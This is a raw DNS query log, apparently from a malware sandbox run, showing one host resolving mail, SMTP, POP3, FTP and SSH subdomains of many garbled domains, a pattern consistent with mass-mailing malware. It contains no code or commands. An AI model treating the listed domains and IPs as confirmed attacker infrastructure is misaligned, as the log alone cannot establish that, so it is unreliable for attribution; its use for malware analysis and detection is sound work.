Nov 30, 2023 11:23:18.664052963 CET	1.1.1.1	192.168.2.4	0xc579	Name error (3)	mailgate.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.727185965 CET	1.1.1.1	192.168.2.4	0xc3a7	Name error (3)	pop3.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.738962889 CET	1.1.1.1	192.168.2.4	0x1098	Name error (3)	pop3.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.783338070 CET	1.1.1.1	192.168.2.4	0x6f73	Name error (3)	smtp.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.802778006 CET	1.1.1.1	192.168.2.4	0x46b7	Name error (3)	mailgate.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.833636045 CET	1.1.1.1	192.168.2.4	0xb1bd	Name error (3)	relay.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.914815903 CET	1.1.1.1	192.168.2.4	0x624	Name error (3)	relay.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.917042017 CET	1.1.1.1	192.168.2.4	0x6f73	Name error (3)	smtp.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.955636978 CET	1.1.1.1	192.168.2.4	0xc61f	Name error (3)	mailgate.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.009134054 CET	1.1.1.1	192.168.2.4	0x797b	Name error (3)	ftp.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.009180069 CET	1.1.1.1	192.168.2.4	0x797b	Name error (3)	ftp.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.019673109 CET	1.1.1.1	192.168.2.4	0xca0d	Name error (3)	ssh.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.019819975 CET	1.1.1.1	192.168.2.4	0xca0d	Name error (3)	ssh.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.020226955 CET	1.1.1.1	192.168.2.4	0x532	Name error (3)	mail.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.020296097 CET	1.1.1.1	192.168.2.4	0x532	Name error (3)	mail.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.123509884 CET	1.1.1.1	192.168.2.4	0x36a4	Name error (3)	relay.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.406992912 CET	1.1.1.1	192.168.2.4	0x6756	No error (0)	o.tv		86.105.245.69	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.476808071 CET	1.1.1.1	192.168.2.4	0x6756	No error (0)	o.tv		86.105.245.69	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.599076986 CET	1.1.1.1	192.168.2.4	0x4b94	Name error (3)	pop.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.645162106 CET	1.1.1.1	192.168.2.4	0x4b94	Name error (3)	pop.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.721209049 CET	1.1.1.1	192.168.2.4	0x8ee6	Name error (3)	relay.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.721226931 CET	1.1.1.1	192.168.2.4	0x8ee6	Name error (3)	relay.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.909538984 CET	1.1.1.1	192.168.2.4	0x48b	Name error (3)	x.oli.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.946297884 CET	1.1.1.1	192.168.2.4	0x4d5f	Name error (3)	x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.994817019 CET	1.1.1.1	192.168.2.4	0x7aa4	Name error (3)	yahcl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:20.006146908 CET	1.1.1.1	192.168.2.4	0x146a	Name error (3)	dnujaicl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:20.019737959 CET	1.1.1.1	192.168.2.4	0xd01e	Name error (3)	yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.102720022 CET	1.1.1.1	192.168.2.4	0xb537	Name error (3)	dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.118331909 CET	1.1.1.1	192.168.2.4	0xfd7	Name error (3)	asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.128586054 CET	1.1.1.1	192.168.2.4	0x82ef	Name error (3)	asjikl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:20.261365891 CET	1.1.1.1	192.168.2.4	0xab14	Name error (3)	ftp.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.326263905 CET	1.1.1.1	192.168.2.4	0x2eff	No error (0)	pop3.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.345122099 CET	1.1.1.1	192.168.2.4	0x9bff	Name error (3)	mail.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.374193907 CET	1.1.1.1	192.168.2.4	0xf995	Name error (3)	mail.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.385485888 CET	1.1.1.1	192.168.2.4	0xded8	Name error (3)	imap.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.385503054 CET	1.1.1.1	192.168.2.4	0xded8	Name error (3)	imap.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.413541079 CET	1.1.1.1	192.168.2.4	0x427	Name error (3)	ftp.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.458503962 CET	1.1.1.1	192.168.2.4	0x42d7	Name error (3)	ssh.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.463992119 CET	1.1.1.1	192.168.2.4	0x9aee	Name error (3)	ssh.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.465315104 CET	1.1.1.1	192.168.2.4	0x1a63	Name error (3)	pop3.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.465336084 CET	1.1.1.1	192.168.2.4	0x1a63	Name error (3)	pop3.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.467677116 CET	1.1.1.1	192.168.2.4	0x9152	Name error (3)	mail.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.468569040 CET	1.1.1.1	192.168.2.4	0x624c	Name error (3)	ssh.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.494635105 CET	1.1.1.1	192.168.2.4	0x2fc0	Name error (3)	mail.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.504209042 CET	1.1.1.1	192.168.2.4	0x13b7	Name error (3)	ftp.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.528038025 CET	1.1.1.1	192.168.2.4	0x3bc4	Name error (3)	ftp.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.539197922 CET	1.1.1.1	192.168.2.4	0xd191	Name error (3)	ssh.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.562786102 CET	1.1.1.1	192.168.2.4	0xdf36	No error (0)	www.o.tv		86.105.245.69	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.579108953 CET	1.1.1.1	192.168.2.4	0x3bc4	Name error (3)	ftp.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.581221104 CET	1.1.1.1	192.168.2.4	0x19f6	No error (0)	ftp.noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.588762045 CET	1.1.1.1	192.168.2.4	0x7de3	Name error (3)	pop.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.625998020 CET	1.1.1.1	192.168.2.4	0xff6d	Name error (3)	pop.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.642241955 CET	1.1.1.1	192.168.2.4	0xdf36	No error (0)	www.o.tv		86.105.245.69	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.642630100 CET	1.1.1.1	192.168.2.4	0x19f6	No error (0)	ftp.noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.642904043 CET	1.1.1.1	192.168.2.4	0x711d	Name error (3)	smtp.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.642947912 CET	1.1.1.1	192.168.2.4	0x711d	Name error (3)	smtp.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.681030035 CET	1.1.1.1	192.168.2.4	0x1990	Name error (3)	imap.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.761935949 CET	1.1.1.1	192.168.2.4	0x52ca	Name error (3)	imap.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.770986080 CET	1.1.1.1	192.168.2.4	0x657a	Name error (3)	pop.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.788256884 CET	1.1.1.1	192.168.2.4	0x1cbb	Name error (3)	pop.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.854029894 CET	1.1.1.1	192.168.2.4	0x87d8	Name error (3)	imap.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.933548927 CET	1.1.1.1	192.168.2.4	0xfbf	Name error (3)	imap.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.983313084 CET	1.1.1.1	192.168.2.4	0xafe3	Name error (3)	mailgate.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.983536005 CET	1.1.1.1	192.168.2.4	0xafe3	Name error (3)	mailgate.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.985961914 CET	1.1.1.1	192.168.2.4	0xe8e9	Name error (3)	smtp.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.990725994 CET	1.1.1.1	192.168.2.4	0x8cef	Name error (3)	pop3.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.063364983 CET	1.1.1.1	192.168.2.4	0x85ea	Name error (3)	smtp.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.079262018 CET	1.1.1.1	192.168.2.4	0xe8e9	Name error (3)	smtp.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.089524031 CET	1.1.1.1	192.168.2.4	0xa5b2	Name error (3)	pop3.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.095037937 CET	1.1.1.1	192.168.2.4	0xd182	Name error (3)	mailgate.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.136989117 CET	1.1.1.1	192.168.2.4	0x38bf	Name error (3)	pop3.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.137892962 CET	1.1.1.1	192.168.2.4	0x4e7f	Name error (3)	pop3.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.148065090 CET	1.1.1.1	192.168.2.4	0xab	Name error (3)	smtp.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.164009094 CET	1.1.1.1	192.168.2.4	0x1d50	Name error (3)	mailgate.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.168567896 CET	1.1.1.1	192.168.2.4	0xa5b2	Name error (3)	pop3.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.187990904 CET	1.1.1.1	192.168.2.4	0x681d	Name error (3)	smtp.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.206501007 CET	1.1.1.1	192.168.2.4	0x25ca	Name error (3)	igaacewo.ukc.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.227240086 CET	1.1.1.1	192.168.2.4	0x4533	Name error (3)	mailgate.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.257484913 CET	1.1.1.1	192.168.2.4	0xf265	Name error (3)	igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.284007072 CET	1.1.1.1	192.168.2.4	0x25ca	Name error (3)	igaacewo.ukc.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.285744905 CET	1.1.1.1	192.168.2.4	0x5284	Name error (3)	mailgate.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.387149096 CET	1.1.1.1	192.168.2.4	0xf265	Name error (3)	igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.387622118 CET	1.1.1.1	192.168.2.4	0x38bf	Name error (3)	pop3.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.485820055 CET	1.1.1.1	192.168.2.4	0x2d50	Name error (3)	6eyaok.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.491679907 CET	1.1.1.1	192.168.2.4	0x4e1a	Name error (3)	hyeail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.492640972 CET	1.1.1.1	192.168.2.4	0x8d20	Name error (3)	md.coyar.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.594162941 CET	1.1.1.1	192.168.2.4	0x6f98	Name error (3)	n.zcom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.594593048 CET	1.1.1.1	192.168.2.4	0xbe35	No error (0)	ssh.96l.com		15.197.204.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.594593048 CET	1.1.1.1	192.168.2.4	0xbe35	No error (0)	ssh.96l.com		3.33.243.145	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.596319914 CET	1.1.1.1	192.168.2.4	0x6ece	Name error (3)	6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.596580029 CET	1.1.1.1	192.168.2.4	0x859a	Name error (3)	ssh.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.596677065 CET	1.1.1.1	192.168.2.4	0xfb9f	Name error (3)	ssh.m7l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.626487970 CET	1.1.1.1	192.168.2.4	0xf2b7	Name error (3)	hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.626840115 CET	1.1.1.1	192.168.2.4	0xa0d9	Name error (3)	md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.631870031 CET	1.1.1.1	192.168.2.4	0x39e1	Name error (3)	relay.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.658865929 CET	1.1.1.1	192.168.2.4	0x862e	No error (0)	ssh.6ail.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.658865929 CET	1.1.1.1	192.168.2.4	0x862e	No error (0)	ssh.6ail.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.663111925 CET	1.1.1.1	192.168.2.4	0x39e1	Name error (3)	relay.hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.665312052 CET	1.1.1.1	192.168.2.4	0x7376	No error (0)	ssh.bjail.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:21.665312052 CET	1.1.1.1	192.168.2.4	0x7376	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:21.665312052 CET	1.1.1.1	192.168.2.4	0x7376	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.665312052 CET	1.1.1.1	192.168.2.4	0x7376	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.668773890 CET	1.1.1.1	192.168.2.4	0xc0bd	No error (0)	ssh.ct.ated.net		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.668773890 CET	1.1.1.1	192.168.2.4	0xc0bd	No error (0)	ssh.ct.ated.net		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.671916008 CET	1.1.1.1	192.168.2.4	0xc079	Name error (3)	n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.697530985 CET	1.1.1.1	192.168.2.4	0x12f6	Name error (3)	relay.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.705282927 CET	1.1.1.1	192.168.2.4	0xa0f3	Name error (3)	relay.x.oli.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.777492046 CET	1.1.1.1	192.168.2.4	0xc0bd	No error (0)	ssh.ct.ated.net		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.777492046 CET	1.1.1.1	192.168.2.4	0xc0bd	No error (0)	ssh.ct.ated.net		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.777509928 CET	1.1.1.1	192.168.2.4	0xd901	Name error (3)	hi9tail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.789298058 CET	1.1.1.1	192.168.2.4	0xc84a	Name error (3)	jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.819420099 CET	1.1.1.1	192.168.2.4	0xd5a0	Name error (3)	relay.dnujaicl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.823817015 CET	1.1.1.1	192.168.2.4	0xff70	Name error (3)	jmramdz9s8l.et	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.823826075 CET	1.1.1.1	192.168.2.4	0xff70	Name error (3)	jmramdz9s8l.et	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.828767061 CET	1.1.1.1	192.168.2.4	0x935b	Name error (3)	relay.asjikl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.858237982 CET	1.1.1.1	192.168.2.4	0x6e37	Name error (3)	hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.860488892 CET	1.1.1.1	192.168.2.4	0x3266	Name error (3)	dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.863490105 CET	1.1.1.1	192.168.2.4	0x449d	Name error (3)	aal.netc	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.867094994 CET	1.1.1.1	192.168.2.4	0x8b54	Name error (3)	il.cam	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.875464916 CET	1.1.1.1	192.168.2.4	0xc13c	Name error (3)	mmoc.nnlgco.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.876424074 CET	1.1.1.1	192.168.2.4	0xc84a	Name error (3)	jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.880593061 CET	1.1.1.1	192.168.2.4	0x454f	Server failure (2)	yah.o.com.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.899311066 CET	1.1.1.1	192.168.2.4	0xa134	Name error (3)	dtianekicomail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.905169010 CET	1.1.1.1	192.168.2.4	0xf11b	Name error (3)	ftp.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.951009035 CET	1.1.1.1	192.168.2.4	0xa21f	Name error (3)	hmsn.il.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:21.964802027 CET	1.1.1.1	192.168.2.4	0xf11b	Name error (3)	ftp.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.968019009 CET	1.1.1.1	192.168.2.4	0x8de4	Name error (3)	il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.969278097 CET	1.1.1.1	192.168.2.4	0x347	Name error (3)	ssh.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.969875097 CET	1.1.1.1	192.168.2.4	0x72c	Name error (3)	aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.970742941 CET	1.1.1.1	192.168.2.4	0xe783	Name error (3)	mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.971924067 CET	1.1.1.1	192.168.2.4	0x9cd1	Server failure (2)	yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.984814882 CET	1.1.1.1	192.168.2.4	0x16f0	Name error (3)	mail.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.987763882 CET	1.1.1.1	192.168.2.4	0x347	Name error (3)	ssh.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:21.991235018 CET	1.1.1.1	192.168.2.4	0x7755	Name error (3)	ftp.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.035680056 CET	1.1.1.1	192.168.2.4	0xb0d0	Name error (3)	ftp.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.040385962 CET	1.1.1.1	192.168.2.4	0x3561	Name error (3)	mail.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.043452024 CET	1.1.1.1	192.168.2.4	0xb4	Name error (3)	ytgaig.tcueain.ch	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.046650887 CET	1.1.1.1	192.168.2.4	0xd2f5	Name error (3)	naburly26a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.048415899 CET	1.1.1.1	192.168.2.4	0x9291	Name error (3)	mail.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.052613020 CET	1.1.1.1	192.168.2.4	0xdfea	Name error (3)	mail.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.054645061 CET	1.1.1.1	192.168.2.4	0x7f98	Name error (3)	naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.055691957 CET	1.1.1.1	192.168.2.4	0x7f07	No error (0)	aamail.co.uk			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.057368040 CET	1.1.1.1	192.168.2.4	0xe362	No error (0)	popss.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.057368040 CET	1.1.1.1	192.168.2.4	0xe362	No error (0)	popss.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.058418989 CET	1.1.1.1	192.168.2.4	0xb50d	Name error (3)	hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.094238043 CET	1.1.1.1	192.168.2.4	0x5c9a	Name error (3)	ssh.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.094985008 CET	1.1.1.1	192.168.2.4	0x5d85	Name error (3)	mail.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.095207930 CET	1.1.1.1	192.168.2.4	0xd195	Name error (3)	yma4j.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.101419926 CET	1.1.1.1	192.168.2.4	0xbef3	Name error (3)	ssh.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.112466097 CET	1.1.1.1	192.168.2.4	0xdfea	Name error (3)	mail.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.113100052 CET	1.1.1.1	192.168.2.4	0x96a5	Name error (3)	hmam.comtmail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.115212917 CET	1.1.1.1	192.168.2.4	0xf65d	Name error (3)	hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.116159916 CET	1.1.1.1	192.168.2.4	0x3422	Name error (3)	ftp.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.121687889 CET	1.1.1.1	192.168.2.4	0xd96c	Name error (3)	otzaail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.151850939 CET	1.1.1.1	192.168.2.4	0x7cef	Name error (3)	yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.174885988 CET	1.1.1.1	192.168.2.4	0x2a8e	Name error (3)	sotuvhlp.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.188668013 CET	1.1.1.1	192.168.2.4	0x839	Name error (3)	ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.192871094 CET	1.1.1.1	192.168.2.4	0xda6c	No error (0)	aamail.co.uk		82.71.214.13	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.198050976 CET	1.1.1.1	192.168.2.4	0xeccb	Name error (3)	ftp.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.222513914 CET	1.1.1.1	192.168.2.4	0xfe98	Name error (3)	otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.225667000 CET	1.1.1.1	192.168.2.4	0x73b1	No error (0)	popss.com		52.58.78.16	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.239948988 CET	1.1.1.1	192.168.2.4	0xbc3	Name error (3)	sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.274945974 CET	1.1.1.1	192.168.2.4	0x1962	Name error (3)	ftp.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.300136089 CET	1.1.1.1	192.168.2.4	0xf067	No error (0)	qoil.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.305845022 CET	1.1.1.1	192.168.2.4	0x2a8e	Name error (3)	sotuvhlp.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.307276011 CET	1.1.1.1	192.168.2.4	0xf067	No error (0)	qoil.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:22.329775095 CET	1.1.1.1	192.168.2.4	0x94a8	No error (0)	qoil.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.351567030 CET	1.1.1.1	192.168.2.4	0xd775	Name error (3)	mail.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		164.90.197.105	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		147.182.160.18	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		164.90.197.143	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		164.90.197.79	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		147.182.189.184	A (IP address)	IN (0x0001)	false
